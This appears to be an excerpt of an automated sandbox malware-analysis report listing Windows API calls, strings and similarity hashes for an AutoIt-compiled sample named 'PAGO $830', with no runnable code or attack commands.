                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CA7
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DF2CB0
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CBF
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DF2CC8
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CCF
                                                          • GlobalFree.KERNEL32(00000000), ref: 00DF2CDA
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CEC
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC54,00000000), ref: 00DF2D02
                                                          • GlobalFree.KERNEL32(00000000), ref: 00DF2D12
                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DF2D38
                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DF2D57
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D79
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2F66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: 610b6873b9cbbb3100b46066d8c2500b7419a2ff432140dafa3b62a09057460b
                                                          • Instruction ID: 8b3484cb68737ac275d0d58642167da79091272ee63ccfbd11158f368d16bfa2
                                                          • Opcode Fuzzy Hash: 610b6873b9cbbb3100b46066d8c2500b7419a2ff432140dafa3b62a09057460b
                                                          • Instruction Fuzzy Hash: BD028A71900208AFDB14DF65CC89EBE7BB9EF48710F148258FA15AB2A1DB71AD45CB70
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 00E06FFE
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E0702F
                                                          • GetSysColor.USER32(0000000F), ref: 00E0703B
                                                          • SetBkColor.GDI32(?,000000FF), ref: 00E07055
                                                          • SelectObject.GDI32(?,?), ref: 00E07064
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E0708F
                                                          • GetSysColor.USER32(00000010), ref: 00E07097
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00E0709E
                                                          • FrameRect.USER32(?,?,00000000), ref: 00E070AD
                                                          • DeleteObject.GDI32(00000000), ref: 00E070B4
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E070FF
                                                          • FillRect.USER32(?,?,?), ref: 00E07131
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E07153
                                                            • Part of subcall function 00E072B7: GetSysColor.USER32(00000012), ref: 00E072F0
                                                            • Part of subcall function 00E072B7: SetTextColor.GDI32(?,?), ref: 00E072F4
                                                            • Part of subcall function 00E072B7: GetSysColorBrush.USER32(0000000F), ref: 00E0730A
                                                            • Part of subcall function 00E072B7: GetSysColor.USER32(0000000F), ref: 00E07315
                                                            • Part of subcall function 00E072B7: GetSysColor.USER32(00000011), ref: 00E07332
                                                            • Part of subcall function 00E072B7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07340
                                                            • Part of subcall function 00E072B7: SelectObject.GDI32(?,00000000), ref: 00E07351
                                                            • Part of subcall function 00E072B7: SetBkColor.GDI32(?,00000000), ref: 00E0735A
                                                            • Part of subcall function 00E072B7: SelectObject.GDI32(?,?), ref: 00E07367
                                                            • Part of subcall function 00E072B7: InflateRect.USER32(?,000000FF,000000FF), ref: 00E07386
                                                            • Part of subcall function 00E072B7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E0739D
                                                            • Part of subcall function 00E072B7: GetWindowLongW.USER32(00000000,000000F0), ref: 00E073AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: 249e8cc10c6e57510410f4305a604fe68b2fc0599a3f418f3b58f4025580cf9c
                                                          • Instruction ID: cf9e222c15bc4c05a3572b5e9972d356035d80df97546347d5dd204ed48a683c
                                                          • Opcode Fuzzy Hash: 249e8cc10c6e57510410f4305a604fe68b2fc0599a3f418f3b58f4025580cf9c
                                                          • Instruction Fuzzy Hash: BCA1B272409301AFD7109F61DC48E6B7BA9FF49320F201B19F9A2B61E1D772E988CB51
                                                          APIs
                                                          • DestroyWindow.USER32(?,?), ref: 00D8A389
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DC7518
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DC7551
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC7996
                                                            • Part of subcall function 00D8A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D8A15D,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00D8A53A
                                                          • SendMessageW.USER32(?,00001053), ref: 00DC79D2
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DC79E9
                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DC79FF
                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DC7A0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 2760611726-4108050209
                                                          • Opcode ID: d5ed6967791f169989e30712b65ab4ca7c29b10461709cfee2c85f33005ef921
                                                          • Instruction ID: a1f677edcf77a4e8f0ebefee9bcdddb0c4f2ed0c4ef6f8fc9307cb5405101982
                                                          • Opcode Fuzzy Hash: d5ed6967791f169989e30712b65ab4ca7c29b10461709cfee2c85f33005ef921
                                                          • Instruction Fuzzy Hash: DF129E34508602AFDB25DF69C884FA9BBE5FF45300F28456DF5859B261C731E886CFA2
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 00DF2665
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DF2791
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DF27D0
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DF27E0
                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DF2827
                                                          • GetClientRect.USER32(00000000,?), ref: 00DF2833
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DF287C
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DF288B
                                                          • GetStockObject.GDI32(00000011), ref: 00DF289B
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00DF289F
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DF28AF
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF28B8
                                                          • DeleteDC.GDI32(00000000), ref: 00DF28C1
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DF28ED
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DF2904
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DF2944
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DF2958
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DF2969
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DF299E
                                                          • GetStockObject.GDI32(00000011), ref: 00DF29A9
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DF29B4
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DF29BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE4A0B
                                                          • GetDriveTypeW.KERNEL32(?,00E0D034,?,\\.\,00E0D0D0), ref: 00DE4AE8
                                                          • SetErrorMode.KERNEL32(00000000,00E0D034,?,\\.\,00E0D0D0), ref: 00DE4C54
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 00E072F0
                                                          • SetTextColor.GDI32(?,?), ref: 00E072F4
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E0730A
                                                          • GetSysColor.USER32(0000000F), ref: 00E07315
                                                          • CreateSolidBrush.GDI32(?), ref: 00E0731A
                                                          • GetSysColor.USER32(00000011), ref: 00E07332
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07340
                                                          • SelectObject.GDI32(?,00000000), ref: 00E07351
                                                          • SetBkColor.GDI32(?,00000000), ref: 00E0735A
                                                          • SelectObject.GDI32(?,?), ref: 00E07367
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E07386
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E0739D
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E073AA
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E073F9
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E07423
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E07441
                                                          • DrawFocusRect.USER32(?,?), ref: 00E0744C
                                                          • GetSysColor.USER32(00000011), ref: 00E0745D
                                                          • SetTextColor.GDI32(?,00000000), ref: 00E07465
                                                          • DrawTextW.USER32(?,00E06FC4,000000FF,?,00000000), ref: 00E07477
                                                          • SelectObject.GDI32(?,?), ref: 00E0748E
                                                          • DeleteObject.GDI32(?), ref: 00E07499
                                                          • SelectObject.GDI32(?,?), ref: 00E0749F
                                                          • DeleteObject.GDI32(?), ref: 00E074A4
                                                          • SetTextColor.GDI32(?,?), ref: 00E074AA
                                                          • SetBkColor.GDI32(?,?), ref: 00E074B4
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00E0105B
                                                          • GetDesktopWindow.USER32 ref: 00E01070
                                                          • GetWindowRect.USER32(00000000), ref: 00E01077
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E010CC
                                                          • DestroyWindow.USER32(?), ref: 00E010EC
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E01120
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E0113E
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E01150
                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E01165
                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E01178
                                                          • IsWindowVisible.USER32(00000000), ref: 00E011D4
                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E011EF
                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E01203
                                                          • GetWindowRect.USER32(00000000,?), ref: 00E0121B
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00E01241
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00E0125B
                                                          • CopyRect.USER32(?,?), ref: 00E01272
                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E012DD
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00E00218
                                                          • _wcslen.LIBCMT ref: 00E00252
                                                          • _wcslen.LIBCMT ref: 00E002BC
                                                          • _wcslen.LIBCMT ref: 00E00324
                                                          • _wcslen.LIBCMT ref: 00E003A8
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E003F8
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E00437
                                                            • Part of subcall function 00D73536: _wcslen.LIBCMT ref: 00D73541
                                                            • Part of subcall function 00DD2183: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DD219C
                                                            • Part of subcall function 00DD2183: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DD21CE
                                                          Similarity
                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 1103490817-719923060
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8E8FC
                                                          • GetSystemMetrics.USER32(00000007), ref: 00D8E904
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8E92F
                                                          • GetSystemMetrics.USER32(00000008), ref: 00D8E937
                                                          • GetSystemMetrics.USER32(00000004), ref: 00D8E95C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D8E979
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D8E989
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D8E9BC
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D8E9D0
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00D8E9EE
                                                          • GetStockObject.GDI32(00000011), ref: 00D8EA0A
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8EA15
                                                            • Part of subcall function 00D8EA9A: GetCursorPos.USER32(?), ref: 00D8EAAE
                                                            • Part of subcall function 00D8EA9A: ScreenToClient.USER32(?,?), ref: 00D8EACB
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000001), ref: 00D8EB02
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000002), ref: 00D8EB1C
                                                          • SetTimer.USER32(00000000,00000000,00000028,00D8A671), ref: 00D8EA3C
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          APIs
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
                                                            • Part of subcall function 00DD103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1064
                                                            • Part of subcall function 00DD103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1073
                                                            • Part of subcall function 00DD103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD107A
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD1091
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0D39
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0D6D
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0D84
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0DBE
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0DDA
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0DF1
                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0DF9
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00DD0E00
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0E21
                                                          • CopySid.ADVAPI32(00000000), ref: 00DD0E28
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0E57
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0E79
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0E8B
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0EB2
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0EB9
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0EC2
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0EC9
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0ED2
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0ED9
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0EE5
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0EEC
                                                            • Part of subcall function 00DD10D7: GetProcessHeap.KERNEL32(00000008,00DD0AF5,?,00000000,?,00DD0AF5,?), ref: 00DD10E5
                                                            • Part of subcall function 00DD10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DD0AF5,?), ref: 00DD10EC
                                                            • Part of subcall function 00DD10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0AF5,?), ref: 00DD10FB
                                                          Similarity
                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 4175595110-0
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00E0824C
                                                          • _wcslen.LIBCMT ref: 00E08260
                                                          • _wcslen.LIBCMT ref: 00E08283
                                                          • _wcslen.LIBCMT ref: 00E082A6
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E082E4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E05B27), ref: 00E08340
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08379
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E083BC
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E083F3
                                                          • FreeLibrary.KERNEL32(?), ref: 00E083FF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0840F
                                                          • DestroyIcon.USER32(?,?,?,?,?,00E05B27), ref: 00E0841E
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E0843B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E08447
                                                          Similarity
                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                          • String ID: '[$.dll$.exe$.icl
                                                          • API String ID: 799131459-3381137885
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFC3E4
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E0D0D0,00000000,?,00000000,?,?), ref: 00DFC46B
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DFC4CB
                                                          • _wcslen.LIBCMT ref: 00DFC51B
                                                          • _wcslen.LIBCMT ref: 00DFC596
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DFC5D9
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DFC6E8
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DFC774
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DFC7A8
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00DFC7B5
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DFC887
                                                          Strings
                                                          Similarity
                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 9721498-966354055
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00E008F9
                                                          • _wcslen.LIBCMT ref: 00E00934
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E00987
                                                          • _wcslen.LIBCMT ref: 00E009BD
                                                          • _wcslen.LIBCMT ref: 00E00A39
                                                          • _wcslen.LIBCMT ref: 00E00AB4
                                                            • Part of subcall function 00D73536: _wcslen.LIBCMT ref: 00D73541
                                                            • Part of subcall function 00DD2B2C: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DD2B3E
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 1103490817-4258414348
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 1256254125-909552448
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 0-1645009161
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 00DD5984
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DD5996
                                                          • SetWindowTextW.USER32(?,?), ref: 00DD59AD
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00DD59C2
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00DD59C8
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00DD59D8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00DD59DE
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DD59FF
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DD5A19
                                                          • GetWindowRect.USER32(?,?), ref: 00DD5A22
                                                          • _wcslen.LIBCMT ref: 00DD5A89
                                                          • SetWindowTextW.USER32(?,?), ref: 00DD5AC5
                                                          • GetDesktopWindow.USER32 ref: 00DD5ACB
                                                          • GetWindowRect.USER32(00000000), ref: 00DD5AD2
                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DD5B29
                                                          • GetClientRect.USER32(?,?), ref: 00DD5B36
                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DD5B5B
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DD5B85
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                          • String ID:
                                                          • API String ID: 895679908-0
                                                          APIs
                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D90046
                                                            • Part of subcall function 00D9006D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4070C,00000FA0,147F201B,?,?,?,?,00DB2353,000000FF), ref: 00D9009C
                                                            • Part of subcall function 00D9006D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DB2353,000000FF), ref: 00D900A7
                                                            • Part of subcall function 00D9006D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DB2353,000000FF), ref: 00D900B8
                                                            • Part of subcall function 00D9006D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D900CE
                                                            • Part of subcall function 00D9006D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D900DC
                                                            • Part of subcall function 00D9006D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D900EA
                                                            • Part of subcall function 00D9006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90115
                                                            • Part of subcall function 00D9006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90120
                                                          • ___scrt_fastfail.LIBCMT ref: 00D90067
                                                            • Part of subcall function 00D90023: __onexit.LIBCMT ref: 00D90029
                                                          Strings
                                                          • WakeAllConditionVariable, xrefs: 00D900E2
                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D900A2
                                                          • InitializeConditionVariable, xrefs: 00D900C8
                                                          • SleepConditionVariableCS, xrefs: 00D900D4
                                                          • kernel32.dll, xrefs: 00D900B3
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                          • API String ID: 66158676-1714406822
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
